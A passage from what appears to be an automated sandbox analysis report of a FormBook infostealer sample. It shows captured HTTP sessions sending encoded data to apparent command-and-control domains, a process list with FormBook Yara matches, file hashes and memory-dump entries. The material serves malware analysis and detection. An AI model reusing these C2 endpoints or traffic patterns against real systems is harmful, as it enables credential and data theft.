                                                                    24 | 192.168.2.6 | 64244 | 77.68.64.45 | 80 | 2496 | C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 10, 2025 21:32:47.751015902 CET | 493 | OUT | GET /725g/?bJMLqbS=uiAekWsFoddhMu9w6av3IR3qRfkxEYhiHCdKsu6SwDAva+OcXfn0u3hNB8zZhz0kzkOslwZXAdf6Zktj+FCGjzQZh9bjjklx+lq67asD3Aqsp6I0O3QatHKxujksh8AYT18lk1s=&xHrti=IpSlbxE0jR HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.dietcoffee.online
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Jan 10, 2025 21:32:48.368899107 CET | 373 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx/1.25.3
                                                                    Date: Fri, 10 Jan 2025 20:32:49 GMT
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Content-Length: 203
                                                                    Connection: close
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /725g/ was not found on this server.</p></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    25 | 192.168.2.6 | 64245 | 208.91.197.27 | 80 | 2496 | C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 10, 2025 21:32:53.641719103 CET | 756 | OUT | POST /v2ut/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.guacamask.online
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 212
                                                                    Connection: close
                                                                    Origin: http://www.guacamask.online
                                                                    Referer: http://www.guacamask.online/v2ut/
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Data Ascii: bJMLqbS=cwNQIXCQp2K9slZZvxa/1CsIb+Br0+NV7gwdtqO/BJWYHKIN0bGVwb6bb4+bu4FU+ZPzoL9z4pJjKqu5v1FrAUl5isyCKX8PuAH199SUINrAB79aPEVSCxobyRL287N7LzxA+nB6HPSzM/dViMwO13VJRqQN/BAq+tio+aWtBlWanN94xdUY0y/RdcT8LymuZG7j7CxoRBEy


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    26 | 192.168.2.6 | 64246 | 208.91.197.27 | 80 | 2496 | C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 10, 2025 21:32:56.187534094 CET | 780 | OUT | POST /v2ut/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.guacamask.online
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 236
                                                                    Connection: close
                                                                    Origin: http://www.guacamask.online
                                                                    Referer: http://www.guacamask.online/v2ut/
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Data Ascii: bJMLqbS=cwNQIXCQp2K9uGRZpSy/+CsLHOBr9eMc7gMdtojkA96YJIAN3aGVjr6bQY+aq4Fb+ZCMoOdz4pdjKoG5vEF0AElBvMyMJn8PuAH1957JIMPABOtaNlVRBxoclhL247N/Lzxi+iZUHN6zM+tVlfoNiHVLcKRkyDgkyd7f6ITIRkC9m7gituU7mifTdeLOLSmEbGDjpV9Pe1hR0L29rYaX3DABTgW4b8v37Q==


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    27 | 192.168.2.6 | 64247 | 208.91.197.27 | 80 | 2496 | C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 10, 2025 21:32:58.734687090 CET | 1793 | OUT | POST /v2ut/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.guacamask.online
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 1248
                                                                    Connection: close
                                                                    Origin: http://www.guacamask.online
                                                                    Referer: http://www.guacamask.online/v2ut/
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Data Ascii: bJMLqbS= [TRUNCATED]


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    28 | 192.168.2.6 | 64248 | 208.91.197.27 | 80 | 2496 | C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 10, 2025 21:33:01.275188923 CET | 492 | OUT | GET /v2ut/?xHrti=IpSlbxE0jR&bJMLqbS=RylwLg2ZpVS2rFdSlQee5TIAL9VVjaBtzTw+4qXkIOieMIxPna2x473GB7GRuoZi44HZ9KZH1KJCd6HB3lVLIzhxo/qMOX8MgFiq9bThHJniXb4lO04jER0alxiz9odaEmB/xSI= HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.guacamask.online
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Jan 10, 2025 21:33:02.365308046 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                    Date: Fri, 10 Jan 2025 20:33:01 GMT
                                                                    Server: Apache
                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                    Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                    Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                    Set-Cookie: vsid=908vr48408678150484331; expires=Wed, 09-Jan-2030 20:33:01 GMT; Max-Age=157680000; path=/; domain=www.guacamask.online; HttpOnly
                                                                    Transfer-Encoding: chunked
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Connection: close


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    29 | 192.168.2.6 | 64249 | 84.32.84.32 | 80 | 2496 | C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 10, 2025 21:33:07.563107014 CET | 753 | OUT | POST /qt4m/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.appsolucao.shop
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 212
                                                                    Connection: close
                                                                    Origin: http://www.appsolucao.shop
                                                                    Referer: http://www.appsolucao.shop/qt4m/
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Data Ascii: bJMLqbS=yb4QGOcDnWALXGgoxg/B7TndmMkoJZhDjh1cgRLkenr3cJ6HjlHnv9aSniltYRKAxZoWGeeJr8K3n/kHAJlUASet5m1jFNpo9nqNIj+sU9rcuEJWHcmLTDaDpV4WZgn5hrcM/To9AZ/OYvRWL0OnVXsgi3qsiOPlUhDRcTYaZCDbEmSC5l2A+t0eaPtgluWBYXd8DM3L3QqP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    30 | 192.168.2.6 | 64250 | 84.32.84.32 | 80 | 2496 | C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 10, 2025 21:33:10.112173080 CET | 777 | OUT | POST /qt4m/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.appsolucao.shop
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 236
                                                                    Connection: close
                                                                    Origin: http://www.appsolucao.shop
                                                                    Referer: http://www.appsolucao.shop/qt4m/
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Data Ascii: bJMLqbS=yb4QGOcDnWALXnQoiTXB5znc48koQJhPjhJcgV6jeRT3bseHig7ns9aSvClkXxLMxZljGb+Jr823n+0Hcq9Laiev/m1hY9po9nqNIj6VU5Hcv3RWG+eIQDaAqV4Wdgmwhrci/WIXAaHOYtZWLmmgCHsqvXrApN6xTCKoSVYmaQnEBQPYlW2js9UcaN1SlOWraXl8Rb7s4kPsWC6H+ORrPQUZsHrVh3WzjA==


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    31 | 192.168.2.6 | 64251 | 84.32.84.32 | 80 | 2496 | C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 10, 2025 21:33:12.657037020 CET | 1790 | OUT | POST /qt4m/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.appsolucao.shop
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 1248
                                                                    Connection: close
                                                                    Origin: http://www.appsolucao.shop
                                                                    Referer: http://www.appsolucao.shop/qt4m/
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    32 | 192.168.2.6 | 64252 | 84.32.84.32 | 80 | 2496 | C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 10, 2025 21:33:15.198080063 CET | 491 | OUT | GET /qt4m/?bJMLqbS=/ZQwF7Ip71YCaUlU/jTQ7l2Lp/ZTQN44rx1LzCy9bB7kVb+FnyrErN7h2wh6V0uCxKMxAv7qgoDPyMkbBqZLKSqD3jYvFd9V+3GHQAeGdc6B9Gg3Jsv2Vj+r5nwJfwG+iPE84zU=&xHrti=IpSlbxE0jR HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.appsolucao.shop
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Jan 10, 2025 21:33:15.668168068 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                    Date: Fri, 10 Jan 2025 20:33:15 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 9973
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Server: hcdn
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    x-hcdn-request-id: a20d1d2a53215981fa25b6ea892f9457-bos-edge4
                                                                    Expires: Fri, 10 Jan 2025 20:33:14 GMT
                                                                    Cache-Control: no-cache
                                                                    Accept-Ranges: bytes


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    33 | 192.168.2.6 | 64253 | 104.21.80.1 | 80 | 2496 | C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 10, 2025 21:33:20.727333069 CET | 762 | OUT | POST /2pcx/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.aziziyeescortg.xyz
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 212
                                                                    Connection: close
                                                                    Origin: http://www.aziziyeescortg.xyz
                                                                    Referer: http://www.aziziyeescortg.xyz/2pcx/
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Jan 10, 2025 21:33:21.361675978 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Fri, 10 Jan 2025 20:33:21 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                    Pragma: no-cache
                                                                    cf-cache-status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UJGKmTvi9mSERkfB9QqwNfvbi062k1%2Biv%2FNV5ZTApW45axzlJyXsf9r2sFZ5veY3Lc84BO8Ew3PnP0YtV%2BZt3j8olQfD224uOVqH%2Bkagdv77RiXiirkqD%2BCrzq4PixsPvCN3Oz9KiM2U"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8fff710ae8f68c0f-EWR
                                                                    Content-Encoding: gzip
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1943&min_rtt=1943&rtt_var=971&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=762&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    34 | 192.168.2.6 | 64254 | 104.21.80.1 | 80 | 2496 | C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 10, 2025 21:33:23.281539917 CET | 786 | OUT | POST /2pcx/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.aziziyeescortg.xyz
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 236
                                                                    Connection: close
                                                                    Origin: http://www.aziziyeescortg.xyz
                                                                    Referer: http://www.aziziyeescortg.xyz/2pcx/
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Jan 10, 2025 21:33:23.894311905 CET | 906 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Fri, 10 Jan 2025 20:33:23 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                    Pragma: no-cache
                                                                    cf-cache-status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LuMsGH8l6vFK5Eq5yYcRGuy9vgterHnfXiwBRh37xCprA3PUpkvOdmnnNd2yCwTdSSk8qzU1euq0fyuFabVRhKIYp%2BeMJJuLeJlcYGk1pJWhNBclo5JITK02%2BxtsalpHgfypGE9CNneF"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8fff711afe767d0e-EWR
                                                                    Content-Encoding: gzip
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1980&min_rtt=1980&rtt_var=990&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=786&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                    Target ID:0
                                                                    Start time:15:30:16
                                                                    Start date:10/01/2025
                                                                    Path:C:\Users\user\Desktop\NFhRxwbegd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\NFhRxwbegd.exe"
                                                                    Imagebase:0x360000
                                                                    File size:865'280 bytes
                                                                    MD5 hash:7B4D6F3B6A3B509738048774B20FAD27
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:5
                                                                    Start time:15:30:34
                                                                    Start date:10/01/2025
                                                                    Path:C:\Users\user\Desktop\NFhRxwbegd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\NFhRxwbegd.exe"
                                                                    Imagebase:0xe50000
                                                                    File size:865'280 bytes
                                                                    MD5 hash:7B4D6F3B6A3B509738048774B20FAD27
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2561213396.0000000001830000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2560447934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2562570319.00000000026F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:7
                                                                    Start time:15:30:42
                                                                    Start date:10/01/2025
                                                                    Path:C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe"
                                                                    Imagebase:0x490000
                                                                    File size:140'800 bytes
                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:8
                                                                    Start time:15:30:44
                                                                    Start date:10/01/2025
                                                                    Path:C:\Windows\SysWOW64\ieUnatt.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\SysWOW64\ieUnatt.exe"
                                                                    Imagebase:0xb50000
                                                                    File size:122'880 bytes
                                                                    MD5 hash:4E9919DF2EF531B389ABAEFD35AD546E
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4085031615.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4082243589.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4085165315.0000000004F10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low
                                                                    Has exited:false

                                                                    Target ID:9
                                                                    Start time:15:30:58
                                                                    Start date:10/01/2025
                                                                    Path:C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe"
                                                                    Imagebase:0x490000
                                                                    File size:140'800 bytes
                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4087823404.00000000052A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:11
                                                                    Start time:15:31:11
                                                                    Start date:10/01/2025
                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                    Imagebase:0x7ff799c70000
                                                                    File size:676'768 bytes
                                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true


                                                                      Execution Graph

                                                                      Execution Coverage:10.6%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:225
                                                                      Total number of Limit Nodes:21

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ry$ry$ry
                                                                      • API String ID: 0-128149707
                                                                      • Opcode ID: 3ef13117e124ca67ce76a2f916dcd62daf0523b914bda3e2e261cc546fc5211c
                                                                      • Instruction ID: 55811ee322af4e8e22705c662063231e5ab9798e83c362f0e970813539f46ae6
                                                                      • Opcode Fuzzy Hash: 3ef13117e124ca67ce76a2f916dcd62daf0523b914bda3e2e261cc546fc5211c
                                                                      • Instruction Fuzzy Hash: 49E1AE74D04609DFDB14DFA9C8818AEFBB6FF89310B158569D981AB218D734DA42CFD0

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ry$ry$ry
                                                                      • API String ID: 0-128149707
                                                                      • Opcode ID: 7631c90cb91d5570c113bcb3aa79d63070e40c4340548e12206a0f6fa7d88d43
                                                                      • Instruction ID: 53a71b60d593ac82324bc72337588ca078ade6c21c94a2c2c735c4b3a8acc2fa
                                                                      • Opcode Fuzzy Hash: 7631c90cb91d5570c113bcb3aa79d63070e40c4340548e12206a0f6fa7d88d43
                                                                      • Instruction Fuzzy Hash: C5D16974E0420ADFDB54DFA5C4858AEFBB6FF89300B158466D552AB218D734DA42CFD0

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ry$ry$ry
                                                                      • API String ID: 0-128149707
                                                                      • Opcode ID: f086c9e64fa77dc5777e03d5270788e35d5490834089f6c0a871ff8125095b32
                                                                      • Instruction ID: e45e48ed9d65cc14b61f7c485dbc7ffb65846aaff072cf23862ff0942b3bcba2
                                                                      • Opcode Fuzzy Hash: f086c9e64fa77dc5777e03d5270788e35d5490834089f6c0a871ff8125095b32
                                                                      • Instruction Fuzzy Hash: 25C14474E0420ADFDB54DFA5C4858AEFBB6FF88300B11945AD516AB318D734EA82CF94

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: TuA$UC;"
                                                                      • API String ID: 0-2071649361
                                                                      • Opcode ID: 6df172c7c096f38e64af555e0fd26f5036402753f0db941b6e92197681f2eb81
                                                                      • Instruction ID: 109e8a5cf2cefeea00aa0f83d4ab978a7cba76640ffa8f5cdd2346765c60d55b
                                                                      • Opcode Fuzzy Hash: 6df172c7c096f38e64af555e0fd26f5036402753f0db941b6e92197681f2eb81
                                                                      • Instruction Fuzzy Hash: 9D9136B4D15209EFDB48DFA6E58059EFBF2EF89350F10A42AE515AB264D7309906CF80

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2390515530.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6de0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: TuA$UC;"
                                                                      • API String ID: 0-2071649361
                                                                      • Opcode ID: e42e04d8b3e52ff7f8dfc343b1298c34b1644a61293a3621db736ac303ee9cb6
                                                                      • Instruction ID: 80cff506998f18d38821b608411730b06ab7f5b9aef961e73d5dc492a4947063
                                                                      • Opcode Fuzzy Hash: e42e04d8b3e52ff7f8dfc343b1298c34b1644a61293a3621db736ac303ee9cb6
